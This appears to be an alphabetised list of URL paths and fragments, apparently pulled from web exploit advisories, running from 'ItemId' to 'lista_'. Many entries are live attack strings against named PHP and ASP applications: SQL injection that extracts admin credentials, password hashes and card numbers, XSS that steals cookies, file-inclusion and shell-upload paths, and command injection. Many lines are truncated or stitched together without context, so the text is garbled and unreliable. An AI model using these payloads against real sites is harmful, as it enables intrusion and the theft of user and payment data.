/?ItemId=1%20and%20substring(@@version,1,1)=5  >>TRUE
/?itemid=123+union+select+1,version(),database(),4,user()--
Itemid,2
*&Itemid=37
Itemid,41
Itemid,52
/?ItemId=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>95
Itemid,70
/?itemid=[SQLi]
&itemID=usershow
item_info.inc.php?install_root=[Shell]
ItemInfo.php?item_id=[sql]
item_list.asp?maingroup=Something&secondgroup=[SQL INJECTION] 
item_list.asp?maingroup=[SQL INJECTION] 
item_list.php?maingroup=%3Cscript%3Ealert('Lamed%20!');%3C
item_list.php?maingroup=-99 'UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment
item_list.php?secondgroup=%3Cscript%3Ealert('Lamed%20!');%3C
item_list.php?secondgroup=-99 'UNION SELECT null, null, creditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment
item_main.php?GLOBALS=[Evil Script]
item.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
item.php?action=post)
item.php?ei=-1 union select 1,username,pass_sha,1,1,1,1,1,1 from foe_account--
item.php?ei=<script>alert(1)<
item.php?ei=[SQLi]
item.php?id=&#039;[SQL]
item.php?id=-1
item.php?id=1080"')
item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+%66%72%6F%6D+PHPAUCTIONXL_adminusers--
item.php?id=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(CHAR(32,58,32),user(),database(),version())--
item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from oc_admin--
item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from+oc_user--
item.php?id=[a valid id] #
item.php?id=[a valid id] #"
item.php?id=[a valid id]'
item.php?id=[SQLi]
item.php?item=107
item.php?item=112
item.php?item=113
item.php?item=114
item.php?item=117
item.php?item=131
item.php?item=26
item.php?item=92
item.php?item=97
item.php?item_id=-1&category_id=Sql
item.php?si d=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION
item_repost.inc.php?install_root=[Shell]
ItemReview.php?item_id=[sql]
items
items_filter.inc.php?install_root=[Shell]
item_show.php?code_no=99 ') UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment 
items.php?CA=-9999'%20union%20select%20user_name,1,2%20from%20fusion_users
items.php?CA=-9999'%20union%20select%20user_password,1,2%20from%20fusion_users
items.queries.php?_SESSION[user_language]=[etc
itemview.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
.*)$#i", $this->url, $tmp);
#i', $this->www->getcontent()))
iti_feu_uploads
itpm
itpm_estimate.php?a=LOCAL_OR_REMOTE_FILE&proj_id=);include($_GET[a]);die(2
itpm_estimate.php?a=LOCAL_OR_REMOTE_FILE&rid=1&proj_id=);include($_GET[a]);die(2
it-security-advisories.php
it-security-advisories.php 
itsecuritysolutions.org
i", $url)) {
.*)$#i",$url,$info);
.*)$#i",$url,$infos);
ivanoculmine
ive1.png
ive1.png) file out of the Barracuda - WebFirewall 660 Appliance Application. 
ive2.png
iwan.or.id
iwant-one-ihave-one
iwrite.brinkster.net
ixmail_netattach.php?file=ixmail_netattach.php
ixxo-cart-plus-demo
ixxo-cart-standalone-and-joomla-component-sql-injection
iyziforum.mdb                                                          #
iyziforum.mdb                              #
izabi
izicontents
[iziContents_path]
izle.php?vid=1'
izumi
j
j0hnx3r.org
j15x
ja
jadro
jaf-cms.sourceforge.net
[JAF_path]
jaist.dl.sourceforge.net
jaist.dl.sourceforge.net:80
jakartaweb.net
jakoch
jaow
jara
jarida
jarida_1.0
jartforms
jatimcrew.org
Javabridge
javascript
javascript"
javascript">[CODE]<
javascript.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
javascript" src="styleinput.js"><
jaws
jaws-0.5.2
JawsDB.php?path=[Evil Script]
jaws_PATH
jax_calendar.php?Y=2005&m=11&d=15&cal_id=[SQL] 
[JaxCMS PATH]
jbilling
jblog
jblog                  #
jbshop
jbshop.php?item_details=1&item_id=-1 union all select group_concat(user_loginname,0x3a,user_password,0x3a,user_admin),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM e107_user--
jcart
jcart-1.1
jcart-gateway.php" method="POST">
jcart-relay.php" method="POST">
jc.desconnets.free.fr
jce-2011-released
jcomponents
jcow
jcow4
[jcow_4.2,5.2]_arbitrary_code_execution
[jcow_4.2,5.2]_arbitrary_code_execution' ]
jcs.function.php?mosConfig_absolute_path=[evilcode]
jdirectory-acesef
je-ajax-event-calender.html
jeauto
je-auto.html
je-content-menu.html
je-content-menu.html?
JED
jedirectory
jeeventcalendar
je-media-player.html
je-media-player.html?view=..
jesectionfinder
jesubmit
jetbox
jet.carbon-4.net
jetpack
Jeux
jevoncms
jevoncms.php?libdir=[lfi]
jfireeagle
jGallery
jgb_eng_php3
JGen_0.9.80
jgen-database
jgs_portal_beitraggraf.php?month=1&year=1[SQL-Injection]
jgs_portal_mitgraf.php?month=1&year=1[SQL-Injection]
jgs_portal.php?anzahl_beitraege=[SQL-Injection]
jgs_portal.php?id='SQL_here 
jgs_portal_sponsor.php?id=[SQL-Injection] 
jgs_portal_statistik.php?meinaction=beitrag&month=1&year=1[SQL-Injection]
jgs_portal_statistik.php?meinaction=mitglieder&month=1&year=1[SQL-Injection]
jgs_portal_statistik.php?meinaction=themen&month=1&year=1[SQL-Injection]
jgs_portal_themengraf.php?month=1&year=1[SQL-Injection]
jgs_portal_viewsgraf.php?jahr=1&monat=1&tag=1[SQL-Injection]
jgs_treffen.php?action=ansicht&view_id=[SQL]
jhjxx
JHnpFRmSBqlf
jihad.in.us'; ?>" size="60">
jimyhendrix.php?command=".urlencode($command)." HTTP
jinzora
jinzora2
jIrUznC.png
jnl_records 
job
job.asp
job-board-software
jobbr ]
jobcomponent
jobdemo
jobdetails.php?jobid=-5 union select 1,2,3,4,5,6,concat(admin,0x3a,email,0x3a,loginname,0x3a,pass),8,9,0,1,2,3,4,5,6,7,8,9,0 from users--
jobhut.spranger.us
job-info.php?job_id=56+and+1=0
job-info.php?job_id=56+and+1=1
job-info.php?job_id=56+and+substring(@@version,1,1)=4
job-info.php?job_id=56+and+substring(@@version,1,1)=5
job-info.php?job_id=[real id]+and+1=0
job-info.php?job_id=[real id]+and+1=1
job-info.php?job_id=[real id]+and+substring(@@version,1,1)=4
job-info.php?job_id=[real id]+and+substring(@@version,1,1)=5
/?job=kwl&kwrd=WWW.BugReport.IR' union select name,password from tblusers where name not like '%WWW.BugReport.IR
JobPost
jobpro
jobprofile-joomla-component-detail.html
jobs
jobs-a-recruitment
jobs.asp
jobsearch
jobsearchengine
jobseeker_document.php
jobseekerloginpage.php
jobseeker_profile_images
jobseeker_register.php
jobseekers
jobsitepro
jobs.php?j=login&p=1'or'1'='1
jobs.php?lang=
jobs-zone-classifieds-script.html
joenas-ejes
joenasejes.cz.cc
joerg.jo.funpic.org
join.php
join.php (join)
joinus.php?vwar_root=[Shell-code]?&cmd=ls
joke-archives.php?cat_name=muhacir&cat_id=15+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5
joke-archives.php?start=0&cat_id=-1 union all select 1,2,concat(user,0x3a,password),4,5,0x625920746152656e7452655878,7,8,9,10,11,12,13 from admin--
jokes
jokes  
jokesite
[jokes path if any]
jokes-script-features.php
Joke_website_script_with_a_20_thousand+_jokes_database_included.html
jollyroger.gif"><
jolt.ca
jomsocial-188-shell-upload-vulnerability.html
joobb
joom163.js><
joomanager
joomla
joomla';
Joomla
Joomla)
joomla-1
joomla15
joomla-1.5
Joomla_1.5.23_ita-Stable_test_expl
joomla-15-2 (check here)
joomla15captcha
joomla15x
joomla160
Joomla_1.6.0-Alpha2-Full-Package
joomla-addons
joomla.anezi.net
joomla-catalog.html
joomla-clantools.de
joomla.clubnautiquemarine.fr
joomlacode.org
joomla-components
Joomla_Components
joomlacontenteditor-comjce-blind-sql.html
joomla_downloads
joomla-extensions
joomlaextensions.co.in
joomla-extensionscomponents
joomla-extensions.instantiate.co.uk
joomla-facebook
joomla-faq-component-extensions-downloads
$joomlahost
joomla.html
joomlamo
joomla-module.html?page=shop.product_details&category_id=4&flypage=flypage.tpl&product_id=51&vmcchk=1
joomlander.net
joomlapath
[joomla_path]
[joomlapath]
joomla_path
[Joomla_Path]
Joomla Path
[JOOMLA_PATH]
joomla-php
joomla-portfolio-component.html
joomla-projects-descargas
joomla.soundset.at
joomla-tag
joomla-tag-download.html
Joomla_Templates
Joomla_und_Mambo_Komponenten
joomlaworks
joomlaxplorer
joomnik
joom.ru
joovili_admins
joovili.images.php?picture=..
Joovili.Patch.3.0.1__2.Themes.WST.rar.html
joovili_users
jorp.short-stack.net
jorp.sourceforge.net
joshch
jos_user
jos_users
jos_users--
jos_users*
jos_users--&task=search
jotloader
journal_change_mask.inc.php?JID=1%20union%20select%201,PACS_description,1,1%20FROM%20pacs%20where%20PACS_ID=2
journal_inquiry.php
journalnessdir
journal.php?m=' 
journal.php?m=home&s=username&w='><script>alert('test');<
journal.php?m='&p=1
journal.php?m='&s=username&w=asc
jowamp
jpg.jpg+onload=alert(+00213771818860)>&show_month=12
jpg.jpg+onload=alert(213771818860)>
Jphone
jphoto
jp_jobs.xml
jportal
jquarks-for-surveys
jquery
jquery.jgrowl_minimized.js"><
jquery-mega-menu
jrBrowser
jrcmsdev
jrcmsdev.sourceforge.net
js
.js
js-appointment
jscript
jscripts
;jsessionid=indoushkasessionfixation
js_include.php?form=%22;alert(0)%3C
js_include.php?form=';alert(0)%3C
js.js><
js.js"><
jsk
jskinternet.pl
jsloader.php?file=..
jsloader.php?files[]=
jsloader.php?files[]=..
json.php" method="post">
json.php?module=administrators&action=delete_administrator&adminId=2" alt="Do you see this?" 
json.php?module=customers&action=delete_customer&customers_id=1" alt="Do you see this?" 
json.php?module=login&action=logoff" alt="Do you see this?" 
json.php?task=category&category_id=999999 union(select 1,concat_ws(0x3a,username,password),3,4+from+go_users)--
json.php?task=comment&comment_id=888881+union+select+1,2,3,4,5,6,(select+concat_ws(0x3a,username,password)+from+go_users+where+id=1)
json.php?task=send_key&fingerprint=xyz;COMMAND
jsonp_primitive.php?callback=%3Cscript%3Ealert%280%29%3C%2fscript%3E
jsp
js.php?module=..
jsupport.html
js_viewnew.php?forumid=2'+AnD+1='1&num=1&length=1
jsview.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
jubb
[jubb_path]
Jul
July
jump
jump_bug.ei
jump.php?action=script&id=1082
jump.php?action=script&id=1420
jump.php?action=script&id=1491
jump.php?action=script&id=1689&SID=b8a60b0cb6352bc4e545abf0dd4ea90d
jump.php?action=script&id=1731
jump.php?action=script&id=1880
jump.php?action=script&id=2006
jump.php?action=script&id=203
jump.php?action=script&id=272
jump.php?action=script&id=41
jump.php?action=script&id=805
jump.php?action=script&id=81
jump.php?action=script&id=825
jump.php?action=script&id=958
jump.php?ID=13698
jump.php?listing_id=19561&jump_type=1
jump.php?listing_id=21062&jump_type=1
jump.php?listing_id=22130&jump_type=1  [0.0.6]
jump.php?listing_id=24219&jump_type=1  [0.0.6 Pro]
jump.php?listing_id=25331&jump_type=1
jump.php?listing_id=36777&jump_type=1
jump.php?listing_id=41298&jump_type=1
jump.php?listing_id=48318&jump_type=1
jump.php?listing_id=52592&jump_type=1
jump.php?listing_id=65863&jump_type=1
jump.php?listing_id=66376&jump_type=1
jump.php?listing_id=6818&jump_type=0
jump.php?listing_id=69667&jump_type=1
jump.php?listing_id=69881&jump_type=1
jump.php?listing_id=71365&jump_type=1
jump.php?listing_id=72677&jump_type=1
jump.php?listing_id=75178&jump_type=1
jump.php?listing_id=78547&jump_type=1
jump.php?listing_id=79106&jump_type=1
jump.php?listing_id=80293&jump_type=1
jump.php?listing_id=80545&jump_type=1
jump.php?listing_id=85112&jump_type=1
jump.php?listing_id=87617&jump_type=1
Jun
june2010
 June 21 2005 #
jupiter
juris
justjoomla.net
justVisual
[JV2 Folder Gallery]
/?jv3gz1zwjxm
jvc_template.php?path= [rfi shell]
jw_allvideos
JxfEI
jzwpea.png
k-159.echo.or.id
K6E9AWrC
 kaçırmayın.
kacper.bblog.pl
kafooeyblog
kaibb
/?kala=p0hh+UNION+ALL+SELECT+1,2,3,4,5+FROM+ppp
/?kala=p0hh+UNION+ALL+SELECT+1,2,3,pwd,5+FROM+nuke_authors
kalender
kalender.php?
kalender.php?form=<
kalender.php?form_field=<
kalender.php?lahter=<
kalender.php?month=5&year=2009"><script>alert('y3nh4ck3r+was+here!')<
kalender.php?month=<script>
kalender.php?vorm=<
kalimat
kamads_ads
[kaMtiEz]
kandalf
~kaper
kapukvalley.net member
kapukvalley.net member										 |
kapukvalley.net member														  |
karevn
kasseler
kasubaoek
katalog.php?id_user=1&sesja=ukEyHkczqqU
kategorie
kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,SuUser,SuEmail,SuPwd,SuSysAut+FROM+sysuser+WHERE+SuID=1%23
kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,SuUser,SuPwd+FROM+sysuser+WHERE+SuID=1%23
kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,version(),database()+sysuser%23
kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,version(),database(),user(),version()%23
kategorie.php?Modus=Search&Kontext=objekt"><script>alert('y3nh4ck3r+was+here!')<
kategorier.php
Kategoriler
kategori.php?id=1[SQL-Code]
kawf
kaxz01.free.fr
Kayako
kb
KB
kbase
kbase.php
kb_constants.php?kb_constants.php&board_config[default_lang]=english&phpEx=..
kb_constants.php?module_root_path=Evil Code
kb_mods
kbot.php?ID=20+[SQL-INJECTION!]--%20-
kb.php?id=10006&category_id=[SQL]
kb.php?id=[SQL] 
kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+1=0 
kb.php?path_faqe=[INDONESIANCODER]
kb.php?start=SQL_CODE_HERE
kb_search.php?keywords=" onmouseover=alert(1) bad="&mode=Search
kcfinder
KCFinder
kde
kdp2h6dbe1
kdpics
[KDPics_path]
keihanna.dl.sourceforge.jp
keith-wood.name
kelvinxgr
keno.php?n1="><script>alert(123);<
keno.php?n20="><script>alert(123);<
kent.dl.sourceforge.net
kerio_winroute_firewall.htm
kernel
kernelpanik
keywordresearch
keyword_search_action.php?gender=male&martial=&fage=18&tage=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,concat(username,0x3a,password),50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 from users
keyword_search_action.php?gender=xxx&martial=&fage=xxx&tage=SQL
kezzap66345
kezzap66345.by.ru
kgcall.php?engine=..
khmheading.php
kht.by.ru
Kiasabz
kids
kietu
kiki91.altervista.org
killacct?domain=(domain)&user=(user)&submit-domain=Terminate 
kimai
kimai)
kinfule
kingchat
kingchat.php?chat=2&l=2
kingchat.php?chat=2&l=2&message=
kingchat.php?notic
kingchat.php?send=Red_Hat&username=[SQLi]
kingcms
kino-gallery
kipper
kipper20
KIS-2013-01
KIS-2013-02
KIS-2013-03
KIS-2013-04
KIS-2013-05
KIS-2013-06
KIS-2013-07
KIS-2013-08
kish.in
kisskool30.free.fr
kJd32D33J11lOk6f7n2
kjtechforce
kkk.php
kldp.net
kleeja
kleo
k-links
[Klinza_path]
km2
kmitamhome
kmrg.itb.ac.id
knowledge
knowledgebase.php?act=art&article_id=[INDONESIANCODER]
knowledgebase.php?mode=view_entry&root=2&sid=c7bb6a0d5f83d61d75053c85c14af247&kbid=4 [SQL]
knowledgebase?qid=[SQL] 
knowledge_searchm.php?action=expand_question&l=admin&x=1&questid=-1
kn.php?aktkat=16 [SQL INJECTION] 
knrAuthorListCustomSortSave.php?listItem[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
knr-author-list-widget
knusperleicht.at
kohanaframework.org
koivi
kolang.php?host=localhost&port=2121
kolifanet-download-script-12-sql-injection-vulnerability
 || !$komenda){usage()}
komentar.php?site_path=[Shell]
komentar.php?site_path=[SHELL]
koment.php?id_phot='-1+union+select+1,2,3,4,haslo+from+imgallery_hasla
kommentar.php?id=
kommentar.php?id=117'
kommentar.php?id=99999+union+select+1,2,3,4,5
komponente
koneksi.php
konfig.php
~konjo
kontakt-1.php5
kontaktformular
kontakt.php?menuid=<script>alert('HELLO');<
*&Kontext=adresse
KoobiPro57.rar.html
kool_kampus
koooraf
kop.fact.co.uk
kora
korat.nfe.go.th
korban.site
korban.site 
kordil
kordiledms
korn19.ch
koschtit..tabere.net
koschtit.tabere.net
kosmos
koyansblog
kp-netlink
kPoll
kpoll-plugin
~krasza
k-rate
kreitje
krunt.org
krw
ksadvertiser
ksc
k-search
ksn00
ksuri.php%00
ktedit
kt_main.php?action=tabelle&liga_id=%27+u
kt_main.php?action=tabelle&liga_id=[vul]
ktmlpro
ktpcomputercust
[ktp_path]
kubeblog
kubelance
Kubelance.v1.6.4.PHP.NULL-DGT.rar.html
kurdish-security-14-mospray-basedir.html
kurdish-security-25-grapagenda-remote.html
kurdish-security-26-annoncev-news.html
kurdish-security-7-foing-remote-file.html
kure
kusabax
kusabax.cultnet.net
kwa
kwalbum
[kwa_path]
kws.koogar.org
kwsphp
","",$l);
l3ez.php">
l3ez.php?cmd=ls
l4dstats
lab
label><
label_mgr
laboratoire.class.php?path_om=[Shell]
labpc:8443
labs
labs.thesonicgroup.net
labstore
labwiki
LabWiki
ladder.php?gid=1'
ladder.php?ladderid=1
ladders.php?platform=-30+UNION%20SELECT%201,2,3,@@version,5,6,7--
ladders.php?platform=( Injection )
/?L=admin.cms.edit&id={cms.file}
/?L=admin.index
/?L=admin.logs.logs
 -L admin -P password
lalbum.php?apa_album_ID=[Real id] 2
lampsecurity.org
lampsecurity.org'
lanai
la-nai
Lanai%20Core
lanai-cms_v1.2.14
landesk-os-command-injection-vulnerability
landfill.elvinbts.org
land.php?file=add_edit_spam_words&sp_id=45'[SQL-INJECTION!]
land.php?file=catalog&parentId=608 - 
land.php?file=catalog&parentId=608[SQL-INJECTION!]
land.php?file=edit_config&config_id=1'+order+by+1--%20-[SQL-INJECTION!]
land.php?file=edit_config&config_id=-1'+union+select+1,
land.php?file=edit_diycontent&pid=5'[SQL-INJECTION!]
land.php?file=edit_faq&faq_id=24[SQL-INJECTION!]
land.php?file=manage_currencie
land.php?file=manage_faq
land.php?file=manage_forum
land.php?file=manage_help - 
land.php?file=manage_spam_words - 
landshop
lands.html
lang
/?lang=..
/?Lang=..
&lang2=..
lang_activity.php?phpbb_root_path=
lang_activity.php?phpbb_root_path=[FILE]
*&lang=bg
/?lang=en
lang_english
/?lang=en&tpl=default&mode=browse&cat_id=-1 UNION SELECT concat(login,0x3a,password) FROM realestate_admin--
lang_file.php?op=export&op2=salvesta&flt_keel=%0d%0a
lang_file.php?op=export&op2=salvesta&keel_id=%0d%0a
lang_file.php?op=import&flt_keel="><script>alert(123);<
lang_file.php?op=import&keel_id="><script>alert(123);<
/?lang=fr&mod=login' UNION ALL SELECT concat(a_login ,0x3a,a_password) FROM pfa_admin
/?lang=[inject code]
/?lang=[LFI] ^ ^
/?lang=[LFI]%00
lang.php 
lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
lang.php?INCDIR=[evil_scripts]
lang.php?mosConfig_absolute_path=[Evilcode]
/?lang=[sqli]
lang-system.php?lang=..
language
language.basic-syntax.phpmode.php
language.basic-syntax.phpmode.php)
language.basic-syntax.phpmode.php). Using this characteristic and the previous point, it is thus possible to construct a file that looks like a small GIF image but that is in fact a PHP file. For example (in hexadecimal):
/?language_id=..
/?language_id=[LFI]
/?language_id=[RFI]
language_menu.php
language.operators.comparison.php
language.php?Action=[SQL]
language.php?cmd=ls%20-la&data_dir=ftp:
language.php?cmd=ls%20-la&pa_lang[include_file]=ftp:
language.php?_LIB_DIR=[Evil_Script]
language.php?path_to_root=[[Sh3LLScript]]
language.php?rootdir=[-Sh3ll-]
language.php?scriptlang=..
languages
languages_cgi.php";
languages_cgi.php?store_data=1&lang2=
languages.inc.php
[lansuite-3.4_beta_r1363]
lansuite.orgapage.de
lasernet.gr
lashiyane.org
last_gallery.php?YAPIG_PATH={Shell}
last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201
last_seen_users_panel
last_seen_users_panel.php?cmd=ls%20-la&settings[locale]=..
last_seen_users_panel.php?settings[locale]=..
last_seen_users_panel.php?settings[locale]=[LFI]
lastvisit.php
latest
 << latest
latestcomment-plugin
latest_news
latest_news.php?id=-3%20union%20select%201,group_concat%28username,0x3a,password%29,3,4,5,6,7,8+from+login
latest.php
latest.php?nid=
latest.php?nid=10
latest.php?nid= 10
latest.php?nid=10 with field comment
latest.php?nid=10 with field name
latest.php?nid=9
latest.php?nid= 9
latest.php?nid=-9   <= False
latest.php?nid=9'[sqli]
latest.php?nid=9    <= True
latest.php?nid=9 with field comment
latest.php?nid=9 with field name
latest.php?nid=%BF%27%22%28
latest.php?nid=http%3A%2F%2Fwww.google.com%2F
latest.php?nid=<script>var+pf_687474703a2f2f6c6f63616c686f73742f74756775782f6c61746573742e706870_6e6964=new+Boolean();<
latest.php?nid= with field comment
latest.php?nid= with field name
latestpost.php?path=[EV!L]
latestrelease
Latest_stable_release
latest-version.html
latestwap.php?url=<script>alert('OopS');< 
latin1),2,3,4
latin1),3,4
latin1),4,5,6,7,8,9
latin1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
launcher.htm')">
launch.inc.php
launchpadlibrarian.net
launchpad.net
la.usch.io
law_firm
layers.php?gfplugins=[Shell]
layers_toggle.php?gfplugins=[Shell]
layers_toggle.php?status=on&ret=[url_redirect_to] 
layout
/?layout=..
layout-3-right
Layout.class.php?gfcommon=[Shell]
layoutHeaderFuncs.php?LibDir=[inj3ct0r sh3ll]
/?layout=[LFI]
layoutManager.php?LibDir=[inj3ct0r sh3ll]
/?layout=modal&option=com_jooproperty&product_id=%22%20onmouseover%3dprompt%28%29%20bad%3d%22&view=booking
layoutParser.php?LibDir=[inj3ct0r sh3ll]
layouts
Layouts
laytonhelpdesk
lazarusgb
lazytown_pirate.swf");
lbdpc15.epfl.ch
lcaldbc.dat
lcflickr
LC_MESSAGES
/?L=cms._cms_file_
lcr
lcxbbportal
LDAP.class.php?gfcommon=[Shell]
ldapextauth
ldapextauth-init.php?gfplugins=[Shell]
LdapExtAuthPlugin.class.php?GLOBALS[gfcommon]=[Shell]
ldap_latest.php?ip=1 union select 'TYPE=TRIGGERNAME' into outfile '
ldap_latest.php?ip=1 union select 'TYPE=TRIGGERS' into outfile '
".$ldserver;
ldu
leaders.php
Leads
leaguemanager
learn
learnloop
learnPath
leave_feedback.inc.php?install_root=[Shell]
leer_comentarios.php?articulo_id=-1
leet
leftmenubody1.php?id=[sqli]
leftmenubody.php?id=[sqli]
left_menu.inc.php?install_root=[Shell]
left_menu.php?row_y5_site_configuration[templates_folder]=[EV!L]
left.php?server=4&cfg[Servers][4][host]=
left_rightslideopen
legacy-software
legs > 
leo.vak.ru
lerNoticia.php?id=-0'+union+all+select+1,2,VERSION(),4,5+from+usuarios--+
leslangues.php?fichier=[SHELL]
lesnyak.ru
lesons
lesson
lesson.php?id=246%20and%201=1 << this true
lesson.php?id=246%20and%201=2 << this faulse
lesson.php?id=246%20and%20substring%28@@version,1,1%29=4 << this faulse
lesson.php?id=246%20and%20substring%28@@version,1,1%29=5 << this true
lesson.php?id=-258+union+select+concat%28c_pass,0x3e,c_user%29,2,3+from+q_config
less.php?argv[1]=|id;
lesterchan.net
letodms
LetoDMS
LetoDMS-3.3.6
letoltes
/?L=events.create )
@lexgb
lexikon.php?action=show&id=null+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+bb1_users+where+userid=1--
/?[LFI]
[LFI]
[LFI]%00
LFI%00
lfi_in_dynpg.html
lfi_in_dzcp.html
lfi_in_eocms_1.html
lfi_in_eocms.html
lfi_in_hycus_cms.html
lfi_in_lightneasy.html
lfi_in_novaboard.html
lgc-alpn
lgpl.html LGP
lh
li>
li><
lib
_lib
lib_action_step.php?GLOBALS[CLASS_PATH]=[evil_scripts]
libcompiler
libcurl
lib.filelist.php?GLOBALS[where_framework]=[evil_code]
libfile.php?&path=..
lib.inc.php?c[path]= [inj3ct0r sh3ll]
lib.module.php?mod_root=[SHELL]
lib.php?GLOBALS[where_framework]=[cmd_url]
lib.php?GLOBALS[where_framework]=[evil_code]
lib.php?REMOTE_ADDR=" , zb_host,zb_dir); 
lib.php?root=[cmd_url]
librariandb
libraries
library
Library
library_rss.php?lang=..
lib.repo.php?GLOBALS[where_framework]=[evil_code]
libreria
librettocms
librettoCMS
libri
libs
lib.simplesel.php?GLOBALS[where_framework]=[evil_code]
libstats
lib.teleskill.php?GLOBALS[where_scs]=[evil_code]
license
license>
license> 
license>  
license.php<
licenses
licensesystem
/?lid=567
life
life.html><
lifetype-1.2.10
[lifetype_dir]
lifetype.net
light
lightblog
LightBlog9.6
lightblog.php
LightNEasy
lightneasy             *]\n".
lightneasy.org
LightNEasy.php?do=login
LightNEasy.php?do=login" method="post" name="main" >
LightNEasy.php?page=..
LightNEasy.php?page=1\
lightopencms
lihat
) like:
lildbi
limbo
~limbo
limbophp.pl
limesurvey
limit
liMIT
LIMIT
LIMIT 0,1
/?limitstart=0&se=1&se_regs[0]=[SQLi]
limny
limon
linc0ln.pl
line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,user_login,user_passw),4,5,6,7+from+auth_users+limit+3,10
lineage2
line.php?
lin_form.php?CLASSPATH=[AvriLhea]                
link
", $link,
link>
linkadmin
link>  ----------> Admin password cs1120
linkads1
linkads1.php
linkads1.php  
linkback1
linkbid
linkcategory.php?id=9999'%20union%20select%20admin_password%20from%20admin
linkcheck.php?linkid=++++++
linkdem.php
Linker IMG
/?linkid=9691814>
linking.page.php?cat_id=-1
linkit.kalikos.org
link-library
link-library-ajax.php?searchll=-1')
linkliste
linklist.php") || die "[-]Cannot connect to Host";
linklist.php?wsname=".$wwwname."&wsurl=".url."&email=".$mail."&description=".$comd)
linklists
link_main.php?phpbb_root_path=[ShellCode]
link-manager.php?orderby=[SQL
link.php?action=list&cat_id=5&',
link.php?cat_id=-1
link.php?cat_id=-1+union+select+1,2,3,4,5,6,7,8,version(),version(),11,12,13,14,15,16,17,18
link.php?grape
link.php?URL=[ENC URL]&Name=&EncryptedMemberID=[ENCODED
link-request-contact-form.cfm
link-request-contact-form.html
links
links.asp?id=-6+union+select+1,2,3,4,5,6,7,concat(0x3e,username,password),9+from+writer--
linkscaffe
link><script>alert('blake
links-extern.php?id=-2+union+select+1,concat_ws(0x3a,user,password),1,1,1,1+from+user
LinksManager
linksnet_newsfeed
[Linksnet_Newsfeed_1_0_path]
linkspheric
links.php?action=deadlink&link_id=[SQL] 
links.php?action=new&newdays=-1+UNION+SELECT+123456
links.php?action=new&newdays=[SQL] 
links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()
links.php?ax=list&sub=2&cat_id=-1%20UNION%20ALL%20SELECT%201,2,load_file('
links.php?cat=1'[Insert Query]
links.php?cat=1&limit=[SQL] 
links.php?cat=1&offset=[SQL]
links.php?cat=[INDONESIANCODER]
links.php?cat=<script>alert(
links.php?c=links&s=title&w=' 
links.php?func=show&id='[SQL Injection] 
links.php?id=-1+union+select+concat(admin_user,char(58),admin_pass,char(58),admin_email)+from+admin
links.php?id={EV!L EXPLO!T} 
links.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher--
links.php?id='+union+select+1,concat(username,0x3a,password)
links.php?link_id=-99%20union%20select%201,2,3,4,password,user,7,8,69,10,11%20from%20mysql.user
links.php?link_id=-99%20union%20select%201,user,password,4,5,6,7,8,9%20from%20mysql.user
links.php?op=MostPopular&ratenum=[scr!pt]alert(document.cookie);[
links.php?op=search&query=google%'%20UNION%20SELECT%200,uname,pass,0,0,0,0,0%20FROM%20users%20where%20uname<>''%20INTO%20OUTFILE%20'
links.php?op=search&query=[scr!pt]alert('tacettin@olympos.org');[
links.php?op=viewslink&sid=-1
linkspile
[LinksSection]?&no_cache=1&action=getviewcategory&category_uid=1%20or%201=1
links_showcat.php?id=2 and 1=0 UNION SELECT 1,concat(username,0x3a,password),3,4 from admin
linkster.php?CID=6+AND+1=2+UNION+SELECT+1,2,3,4,5,6,version(),8--
linktoadminpanel
linkto.php?id=128 2
linkto.php?id=[Real id] 2
linktracker
LinkTrader
linktrader.php
linkvideos_listing.php?category="><script>alert(document.cookie);<
linpha
[linpha]
linpha-1.3.4
linpha-1.3.4\actions\rotate.php?full_convert_path= [your command]
linpha2
linpha.sourceforge.net
lin_save.php?CLASSPATH=[AvriLhea]                
linux2.ohwada.net
linuxeduquebec.org
linux&Save_x=1
lionwiki.0o.cz
lire
lisl-last-image-slider
lispeltuut.org
list
list                                  
list ]
list?
list##
lista_anexos.php?tsk_id=-1
lista_articulos.php?id_categoria=
